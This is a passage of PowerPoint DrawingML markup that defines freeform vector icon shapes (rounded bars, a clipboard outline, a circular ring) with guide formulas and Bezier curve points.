                <a:gd name="T1" fmla="*/ 57 h 57"/>
                <a:gd name="T2" fmla="*/ 28 w 299"/>
                <a:gd name="T3" fmla="*/ 57 h 57"/>
                <a:gd name="T4" fmla="*/ 0 w 299"/>
                <a:gd name="T5" fmla="*/ 28 h 57"/>
                <a:gd name="T6" fmla="*/ 28 w 299"/>
                <a:gd name="T7" fmla="*/ 0 h 57"/>
                <a:gd name="T8" fmla="*/ 271 w 299"/>
                <a:gd name="T9" fmla="*/ 0 h 57"/>
                <a:gd name="T10" fmla="*/ 299 w 299"/>
                <a:gd name="T11" fmla="*/ 28 h 57"/>
                <a:gd name="T12" fmla="*/ 271 w 299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57">
                  <a:moveTo>
                    <a:pt x="271" y="57"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="28" y="57"/>
                    <a:pt x="28" y="57"/>
                    <a:pt x="28" y="57"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="57"/>
                    <a:pt x="0" y="44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86" y="0"/>
                    <a:pt x="299" y="13"/>
                    <a:pt x="299" y="28"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="299" y="44"/>
                    <a:pt x="286" y="57"/>
                    <a:pt x="271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96" name="Freeform 1035">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D48CA32-F897-484B-9952-B01ACB1B1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926" y="4489500"/>
              <a:ext cx="311999" cy="20908"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 757 w 783"/>
                <a:gd name="T1" fmla="*/ 52 h 52"/>
                <a:gd name="T2" fmla="*/ 26 w 783"/>
                <a:gd name="T3" fmla="*/ 52 h 52"/>
                <a:gd name="T4" fmla="*/ 0 w 783"/>
                <a:gd name="T5" fmla="*/ 26 h 52"/>
                <a:gd name="T6" fmla="*/ 26 w 783"/>
                <a:gd name="T7" fmla="*/ 0 h 52"/>
                <a:gd name="T8" fmla="*/ 757 w 783"/>
                <a:gd name="T9" fmla="*/ 0 h 52"/>
                <a:gd name="T10" fmla="*/ 783 w 783"/>
                <a:gd name="T11" fmla="*/ 26 h 52"/>
                <a:gd name="T12" fmla="*/ 757 w 783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3" h="52">
                  <a:moveTo>
                    <a:pt x="757" y="52"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="52"/>
                    <a:pt x="26" y="52"/>
                    <a:pt x="26" y="52"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="52"/>
                    <a:pt x="0" y="40"/>
                    <a:pt x="0" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="11"/>
                    <a:pt x="11" y="0"/>
                    <a:pt x="26" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="757" y="0"/>
                    <a:pt x="757" y="0"/>
                    <a:pt x="757" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="772" y="0"/>
                    <a:pt x="783" y="11"/>
                    <a:pt x="783" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="783" y="40"/>
                    <a:pt x="772" y="52"/>
                    <a:pt x="757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97" name="Freeform 1036">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{232EFE25-CBA0-2141-869D-4F0A56B8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8824" y="4365665"/>
              <a:ext cx="509814" cy="644906"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1165 w 1281"/>
                <a:gd name="T1" fmla="*/ 1624 h 1624"/>
                <a:gd name="T2" fmla="*/ 119 w 1281"/>
                <a:gd name="T3" fmla="*/ 1624 h 1624"/>
                <a:gd name="T4" fmla="*/ 0 w 1281"/>
                <a:gd name="T5" fmla="*/ 1509 h 1624"/>
                <a:gd name="T6" fmla="*/ 0 w 1281"/>
                <a:gd name="T7" fmla="*/ 119 h 1624"/>
                <a:gd name="T8" fmla="*/ 119 w 1281"/>
                <a:gd name="T9" fmla="*/ 0 h 1624"/>
                <a:gd name="T10" fmla="*/ 424 w 1281"/>
                <a:gd name="T11" fmla="*/ 0 h 1624"/>
                <a:gd name="T12" fmla="*/ 449 w 1281"/>
                <a:gd name="T13" fmla="*/ 25 h 1624"/>
                <a:gd name="T14" fmla="*/ 449 w 1281"/>
                <a:gd name="T15" fmla="*/ 90 h 1624"/>
                <a:gd name="T16" fmla="*/ 828 w 1281"/>
                <a:gd name="T17" fmla="*/ 90 h 1624"/>
                <a:gd name="T18" fmla="*/ 828 w 1281"/>
                <a:gd name="T19" fmla="*/ 25 h 1624"/>
                <a:gd name="T20" fmla="*/ 853 w 1281"/>
                <a:gd name="T21" fmla="*/ 0 h 1624"/>
                <a:gd name="T22" fmla="*/ 1165 w 1281"/>
                <a:gd name="T23" fmla="*/ 0 h 1624"/>
                <a:gd name="T24" fmla="*/ 1281 w 1281"/>
                <a:gd name="T25" fmla="*/ 119 h 1624"/>
                <a:gd name="T26" fmla="*/ 1281 w 1281"/>
                <a:gd name="T27" fmla="*/ 1119 h 1624"/>
                <a:gd name="T28" fmla="*/ 1255 w 1281"/>
                <a:gd name="T29" fmla="*/ 1144 h 1624"/>
                <a:gd name="T30" fmla="*/ 1230 w 1281"/>
                <a:gd name="T31" fmla="*/ 1119 h 1624"/>
                <a:gd name="T32" fmla="*/ 1230 w 1281"/>
                <a:gd name="T33" fmla="*/ 119 h 1624"/>
                <a:gd name="T34" fmla="*/ 1165 w 1281"/>
                <a:gd name="T35" fmla="*/ 51 h 1624"/>
                <a:gd name="T36" fmla="*/ 878 w 1281"/>
                <a:gd name="T37" fmla="*/ 51 h 1624"/>
                <a:gd name="T38" fmla="*/ 878 w 1281"/>
                <a:gd name="T39" fmla="*/ 115 h 1624"/>
                <a:gd name="T40" fmla="*/ 853 w 1281"/>
                <a:gd name="T41" fmla="*/ 140 h 1624"/>
                <a:gd name="T42" fmla="*/ 424 w 1281"/>
                <a:gd name="T43" fmla="*/ 140 h 1624"/>
                <a:gd name="T44" fmla="*/ 398 w 1281"/>
                <a:gd name="T45" fmla="*/ 115 h 1624"/>
                <a:gd name="T46" fmla="*/ 398 w 1281"/>
                <a:gd name="T47" fmla="*/ 51 h 1624"/>
                <a:gd name="T48" fmla="*/ 119 w 1281"/>
                <a:gd name="T49" fmla="*/ 51 h 1624"/>
                <a:gd name="T50" fmla="*/ 50 w 1281"/>
                <a:gd name="T51" fmla="*/ 119 h 1624"/>
                <a:gd name="T52" fmla="*/ 50 w 1281"/>
                <a:gd name="T53" fmla="*/ 1509 h 1624"/>
                <a:gd name="T54" fmla="*/ 119 w 1281"/>
                <a:gd name="T55" fmla="*/ 1574 h 1624"/>
                <a:gd name="T56" fmla="*/ 1165 w 1281"/>
                <a:gd name="T57" fmla="*/ 1574 h 1624"/>
                <a:gd name="T58" fmla="*/ 1230 w 1281"/>
                <a:gd name="T59" fmla="*/ 1509 h 1624"/>
                <a:gd name="T60" fmla="*/ 1255 w 1281"/>
                <a:gd name="T61" fmla="*/ 1484 h 1624"/>
                <a:gd name="T62" fmla="*/ 1281 w 1281"/>
                <a:gd name="T63" fmla="*/ 1509 h 1624"/>
                <a:gd name="T64" fmla="*/ 1165 w 1281"/>
                <a:gd name="T65" fmla="*/ 1624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81" h="1624">
                  <a:moveTo>
                    <a:pt x="1165" y="1624"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="119" y="1624"/>
                    <a:pt x="119" y="1624"/>
                    <a:pt x="119" y="1624"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="53" y="1624"/>
                    <a:pt x="0" y="1573"/>
                    <a:pt x="0" y="150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55"/>
                    <a:pt x="54" y="0"/>
                    <a:pt x="119" y="0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438" y="0"/>
                    <a:pt x="449" y="11"/>
                    <a:pt x="449" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="449" y="90"/>
                    <a:pt x="449" y="90"/>
                    <a:pt x="449" y="90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28" y="25"/>
                    <a:pt x="828" y="25"/>
                    <a:pt x="828" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="828" y="11"/>
                    <a:pt x="839" y="0"/>
                    <a:pt x="853" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1165" y="0"/>
                    <a:pt x="1165" y="0"/>
                    <a:pt x="1165" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1229" y="0"/>
                    <a:pt x="1281" y="53"/>
                    <a:pt x="1281" y="119"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1281" y="1119"/>
                    <a:pt x="1281" y="1119"/>
                    <a:pt x="1281" y="1119"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1281" y="1133"/>
                    <a:pt x="1269" y="1144"/>
                    <a:pt x="1255" y="1144"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1241" y="1144"/>
                    <a:pt x="1230" y="1133"/>
                    <a:pt x="1230" y="1119"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1230" y="119"/>
                    <a:pt x="1230" y="119"/>
                    <a:pt x="1230" y="119"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1230" y="81"/>
                    <a:pt x="1201" y="51"/>
                    <a:pt x="1165" y="51"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="878" y="51"/>
                    <a:pt x="878" y="51"/>
                    <a:pt x="878" y="51"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="878" y="115"/>
                    <a:pt x="878" y="115"/>
                    <a:pt x="878" y="115"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="878" y="129"/>
                    <a:pt x="867" y="140"/>
                    <a:pt x="853" y="140"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="424" y="140"/>
                    <a:pt x="424" y="140"/>
                    <a:pt x="424" y="140"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="410" y="140"/>
                    <a:pt x="398" y="129"/>
                    <a:pt x="398" y="115"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="398" y="51"/>
                    <a:pt x="398" y="51"/>
                    <a:pt x="398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82" y="51"/>
                    <a:pt x="50" y="82"/>
                    <a:pt x="50" y="119"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="1509"/>
                    <a:pt x="50" y="1509"/>
                    <a:pt x="50" y="1509"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="1545"/>
                    <a:pt x="81" y="1574"/>
                    <a:pt x="119" y="1574"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1165" y="1574"/>
                    <a:pt x="1165" y="1574"/>
                    <a:pt x="1165" y="1574"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1202" y="1574"/>
                    <a:pt x="1230" y="1546"/>
                    <a:pt x="1230" y="1509"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1230" y="1495"/>
                    <a:pt x="1241" y="1484"/>
                    <a:pt x="1255" y="1484"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1269" y="1484"/>
                    <a:pt x="1281" y="1495"/>
                    <a:pt x="1281" y="1509"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1281" y="1574"/>
                    <a:pt x="1230" y="1624"/>
                    <a:pt x="1165" y="16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98" name="Freeform 1037">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DCCFEA27-D85B-2A4A-A3B8-9F19175EF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337" y="4798283"/>
              <a:ext cx="19299" cy="20908"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 25 w 51"/>
                <a:gd name="T1" fmla="*/ 53 h 53"/>
                <a:gd name="T2" fmla="*/ 7 w 51"/>
                <a:gd name="T3" fmla="*/ 46 h 53"/>
                <a:gd name="T4" fmla="*/ 2 w 51"/>
                <a:gd name="T5" fmla="*/ 38 h 53"/>
                <a:gd name="T6" fmla="*/ 0 w 51"/>
                <a:gd name="T7" fmla="*/ 28 h 53"/>
                <a:gd name="T8" fmla="*/ 7 w 51"/>
                <a:gd name="T9" fmla="*/ 10 h 53"/>
                <a:gd name="T10" fmla="*/ 43 w 51"/>
                <a:gd name="T11" fmla="*/ 10 h 53"/>
                <a:gd name="T12" fmla="*/ 51 w 51"/>
                <a:gd name="T13" fmla="*/ 28 h 53"/>
                <a:gd name="T14" fmla="*/ 49 w 51"/>
                <a:gd name="T15" fmla="*/ 38 h 53"/>
                <a:gd name="T16" fmla="*/ 43 w 51"/>
                <a:gd name="T17" fmla="*/ 46 h 53"/>
                <a:gd name="T18" fmla="*/ 35 w 51"/>
                <a:gd name="T19" fmla="*/ 51 h 53"/>
                <a:gd name="T20" fmla="*/ 25 w 51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53">
                  <a:moveTo>
                    <a:pt x="25" y="53"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="18" y="53"/>
                    <a:pt x="12" y="50"/>
                    <a:pt x="7" y="46"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="43"/>
                    <a:pt x="3" y="41"/>
                    <a:pt x="2" y="38"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="34"/>
                    <a:pt x="0" y="31"/>
                    <a:pt x="0" y="28"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="21"/>
                    <a:pt x="3" y="15"/>
                    <a:pt x="7" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="0"/>
                    <a:pt x="34" y="0"/>
                    <a:pt x="43" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="15"/>
                    <a:pt x="51" y="21"/>
                    <a:pt x="51" y="28"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="31"/>
                    <a:pt x="50" y="34"/>
                    <a:pt x="49" y="38"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="47" y="41"/>
                    <a:pt x="46" y="43"/>
                    <a:pt x="43" y="46"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="41" y="48"/>
                    <a:pt x="38" y="50"/>
                    <a:pt x="35" y="51"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="53"/>
                    <a:pt x="29" y="53"/>
                    <a:pt x="25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99" name="Freeform 1038">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FAAFE10F-F5D5-FF40-9B6D-B4782E9464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8039" y="4336717"/>
              <a:ext cx="191382" cy="83628"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 455 w 480"/>
                <a:gd name="T1" fmla="*/ 211 h 211"/>
                <a:gd name="T2" fmla="*/ 25 w 480"/>
                <a:gd name="T3" fmla="*/ 211 h 211"/>
                <a:gd name="T4" fmla="*/ 0 w 480"/>
                <a:gd name="T5" fmla="*/ 185 h 211"/>
                <a:gd name="T6" fmla="*/ 0 w 480"/>
                <a:gd name="T7" fmla="*/ 25 h 211"/>
                <a:gd name="T8" fmla="*/ 25 w 480"/>
                <a:gd name="T9" fmla="*/ 0 h 211"/>
                <a:gd name="T10" fmla="*/ 455 w 480"/>
                <a:gd name="T11" fmla="*/ 0 h 211"/>
                <a:gd name="T12" fmla="*/ 480 w 480"/>
                <a:gd name="T13" fmla="*/ 25 h 211"/>
                <a:gd name="T14" fmla="*/ 480 w 480"/>
                <a:gd name="T15" fmla="*/ 185 h 211"/>
                <a:gd name="T16" fmla="*/ 455 w 480"/>
                <a:gd name="T17" fmla="*/ 211 h 211"/>
                <a:gd name="T18" fmla="*/ 51 w 480"/>
                <a:gd name="T19" fmla="*/ 160 h 211"/>
                <a:gd name="T20" fmla="*/ 430 w 480"/>
                <a:gd name="T21" fmla="*/ 160 h 211"/>
                <a:gd name="T22" fmla="*/ 430 w 480"/>
                <a:gd name="T23" fmla="*/ 50 h 211"/>
                <a:gd name="T24" fmla="*/ 51 w 480"/>
                <a:gd name="T25" fmla="*/ 50 h 211"/>
                <a:gd name="T26" fmla="*/ 51 w 480"/>
                <a:gd name="T27" fmla="*/ 16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0" h="211">
                  <a:moveTo>
                    <a:pt x="455" y="211"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="211"/>
                    <a:pt x="25" y="211"/>
                    <a:pt x="25" y="211"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="211"/>
                    <a:pt x="0" y="199"/>
                    <a:pt x="0" y="18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469" y="0"/>
                    <a:pt x="480" y="11"/>
                    <a:pt x="480" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="480" y="185"/>
                    <a:pt x="480" y="185"/>
                    <a:pt x="480" y="185"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="480" y="199"/>
                    <a:pt x="469" y="211"/>
                    <a:pt x="455" y="211"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="51" y="160"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="430" y="160"/>
                    <a:pt x="430" y="160"/>
                    <a:pt x="430" y="160"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="430" y="50"/>
                    <a:pt x="430" y="50"/>
                    <a:pt x="430" y="50"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="50"/>
                    <a:pt x="51" y="50"/>
                    <a:pt x="51" y="50"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="51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00" name="Freeform 1039">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89134871-7A87-0540-8AC7-D99A0F373E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28245" y="4282038"/>
              <a:ext cx="110969" cy="75588"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 248 w 277"/>
                <a:gd name="T1" fmla="*/ 187 h 187"/>
                <a:gd name="T2" fmla="*/ 29 w 277"/>
                <a:gd name="T3" fmla="*/ 187 h 187"/>
                <a:gd name="T4" fmla="*/ 4 w 277"/>
                <a:gd name="T5" fmla="*/ 162 h 187"/>
                <a:gd name="T6" fmla="*/ 2 w 277"/>
                <a:gd name="T7" fmla="*/ 153 h 187"/>
                <a:gd name="T8" fmla="*/ 0 w 277"/>
                <a:gd name="T9" fmla="*/ 135 h 187"/>
                <a:gd name="T10" fmla="*/ 138 w 277"/>
                <a:gd name="T11" fmla="*/ 0 h 187"/>
                <a:gd name="T12" fmla="*/ 277 w 277"/>
                <a:gd name="T13" fmla="*/ 135 h 187"/>
                <a:gd name="T14" fmla="*/ 274 w 277"/>
                <a:gd name="T15" fmla="*/ 153 h 187"/>
                <a:gd name="T16" fmla="*/ 273 w 277"/>
                <a:gd name="T17" fmla="*/ 162 h 187"/>
                <a:gd name="T18" fmla="*/ 248 w 277"/>
                <a:gd name="T19" fmla="*/ 187 h 187"/>
                <a:gd name="T20" fmla="*/ 51 w 277"/>
                <a:gd name="T21" fmla="*/ 137 h 187"/>
                <a:gd name="T22" fmla="*/ 226 w 277"/>
                <a:gd name="T23" fmla="*/ 137 h 187"/>
                <a:gd name="T24" fmla="*/ 226 w 277"/>
                <a:gd name="T25" fmla="*/ 135 h 187"/>
                <a:gd name="T26" fmla="*/ 138 w 277"/>
                <a:gd name="T27" fmla="*/ 51 h 187"/>
                <a:gd name="T28" fmla="*/ 50 w 277"/>
                <a:gd name="T29" fmla="*/ 135 h 187"/>
                <a:gd name="T30" fmla="*/ 51 w 277"/>
                <a:gd name="T31" fmla="*/ 137 h 187"/>
                <a:gd name="T32" fmla="*/ 251 w 277"/>
                <a:gd name="T33" fmla="*/ 135 h 187"/>
                <a:gd name="T34" fmla="*/ 252 w 277"/>
                <a:gd name="T35" fmla="*/ 135 h 187"/>
                <a:gd name="T36" fmla="*/ 251 w 277"/>
                <a:gd name="T37" fmla="*/ 13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7" h="187">
                  <a:moveTo>
                    <a:pt x="248" y="187"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="187"/>
                    <a:pt x="29" y="187"/>
                    <a:pt x="29" y="187"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="187"/>
                    <a:pt x="4" y="176"/>
                    <a:pt x="4" y="162"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="160"/>
                    <a:pt x="3" y="157"/>
                    <a:pt x="2" y="153"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="147"/>
                    <a:pt x="0" y="140"/>
                    <a:pt x="0" y="135"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="62"/>
                    <a:pt x="63" y="0"/>
                    <a:pt x="138" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="213" y="0"/>
                    <a:pt x="277" y="62"/>
                    <a:pt x="277" y="135"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="277" y="140"/>
                    <a:pt x="276" y="147"/>
                    <a:pt x="274" y="153"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="274" y="157"/>
                    <a:pt x="273" y="160"/>
                    <a:pt x="273" y="162"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="273" y="176"/>
                    <a:pt x="261" y="187"/>
                    <a:pt x="248" y="187"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="51" y="137"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="226" y="137"/>
                    <a:pt x="226" y="137"/>
                    <a:pt x="226" y="137"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="226" y="136"/>
                    <a:pt x="226" y="135"/>
                    <a:pt x="226" y="135"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="226" y="89"/>
                    <a:pt x="186" y="51"/>
                    <a:pt x="138" y="51"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="91" y="51"/>
                    <a:pt x="50" y="89"/>
                    <a:pt x="50" y="135"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="135"/>
                    <a:pt x="50" y="136"/>
                    <a:pt x="51" y="137"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="251" y="135"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="252" y="135"/>
                    <a:pt x="252" y="135"/>
                    <a:pt x="252" y="135"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="251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01" name="Freeform 1040">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{163DC605-65DF-094D-B6D6-C2764DCD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71957" y="4526489"/>
              <a:ext cx="336124" cy="334514"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 441 w 843"/>
                <a:gd name="T1" fmla="*/ 842 h 842"/>
                <a:gd name="T2" fmla="*/ 157 w 843"/>
                <a:gd name="T3" fmla="*/ 725 h 842"/>
                <a:gd name="T4" fmla="*/ 157 w 843"/>
                <a:gd name="T5" fmla="*/ 156 h 842"/>
                <a:gd name="T6" fmla="*/ 725 w 843"/>
                <a:gd name="T7" fmla="*/ 156 h 842"/>
                <a:gd name="T8" fmla="*/ 725 w 843"/>
                <a:gd name="T9" fmla="*/ 156 h 842"/>
                <a:gd name="T10" fmla="*/ 725 w 843"/>
                <a:gd name="T11" fmla="*/ 156 h 842"/>
                <a:gd name="T12" fmla="*/ 843 w 843"/>
                <a:gd name="T13" fmla="*/ 441 h 842"/>
                <a:gd name="T14" fmla="*/ 725 w 843"/>
                <a:gd name="T15" fmla="*/ 725 h 842"/>
                <a:gd name="T16" fmla="*/ 441 w 843"/>
                <a:gd name="T17" fmla="*/ 842 h 842"/>
                <a:gd name="T18" fmla="*/ 441 w 843"/>
                <a:gd name="T19" fmla="*/ 89 h 842"/>
                <a:gd name="T20" fmla="*/ 192 w 843"/>
                <a:gd name="T21" fmla="*/ 192 h 842"/>
                <a:gd name="T22" fmla="*/ 192 w 843"/>
                <a:gd name="T23" fmla="*/ 689 h 842"/>
                <a:gd name="T24" fmla="*/ 689 w 843"/>
                <a:gd name="T25" fmla="*/ 689 h 842"/>
                <a:gd name="T26" fmla="*/ 792 w 843"/>
                <a:gd name="T27" fmla="*/ 441 h 842"/>
                <a:gd name="T28" fmla="*/ 689 w 843"/>
                <a:gd name="T29" fmla="*/ 192 h 842"/>
                <a:gd name="T30" fmla="*/ 689 w 843"/>
                <a:gd name="T31" fmla="*/ 192 h 842"/>
                <a:gd name="T32" fmla="*/ 441 w 843"/>
                <a:gd name="T33" fmla="*/ 89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3" h="842">
                  <a:moveTo>
                    <a:pt x="441" y="842"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="338" y="842"/>
                    <a:pt x="235" y="803"/>
                    <a:pt x="157" y="725"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="568"/>
                    <a:pt x="0" y="313"/>
                    <a:pt x="157" y="156"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="313" y="0"/>
                    <a:pt x="568" y="0"/>
                    <a:pt x="725" y="156"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="725" y="156"/>
                    <a:pt x="725" y="156"/>
                    <a:pt x="725" y="156"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="725" y="156"/>
                    <a:pt x="725" y="156"/>
                    <a:pt x="725" y="156"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="801" y="232"/>
                    <a:pt x="843" y="333"/>
                    <a:pt x="843" y="441"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="843" y="548"/>
                    <a:pt x="801" y="649"/>
                    <a:pt x="725" y="725"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="647" y="803"/>
                    <a:pt x="544" y="842"/>
                    <a:pt x="441" y="842"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="441" y="89"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="351" y="89"/>
                    <a:pt x="261" y="124"/>
                    <a:pt x="192" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="55" y="329"/>
                    <a:pt x="55" y="552"/>
                    <a:pt x="192" y="689"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="329" y="826"/>
                    <a:pt x="552" y="826"/>
                    <a:pt x="689" y="689"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="756" y="623"/>
                    <a:pt x="792" y="534"/>
                    <a:pt x="792" y="441"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="792" y="347"/>
                    <a:pt x="756" y="259"/>
                    <a:pt x="689" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="689" y="192"/>
                    <a:pt x="689" y="192"/>
                    <a:pt x="689" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="621" y="124"/>
                    <a:pt x="531" y="89"/>
                    <a:pt x="44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02" name="Freeform 1041">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB363B48-D57F-1946-A016-47A88CE0D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3751" y="4798284"/>
              <a:ext cx="57897" cy="56289"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 115 w 143"/>
                <a:gd name="T1" fmla="*/ 140 h 140"/>
                <a:gd name="T2" fmla="*/ 97 w 143"/>
                <a:gd name="T3" fmla="*/ 133 h 140"/>
                <a:gd name="T4" fmla="*/ 10 w 143"/>
                <a:gd name="T5" fmla="*/ 46 h 140"/>
                <a:gd name="T6" fmla="*/ 10 w 143"/>
                <a:gd name="T7" fmla="*/ 10 h 140"/>
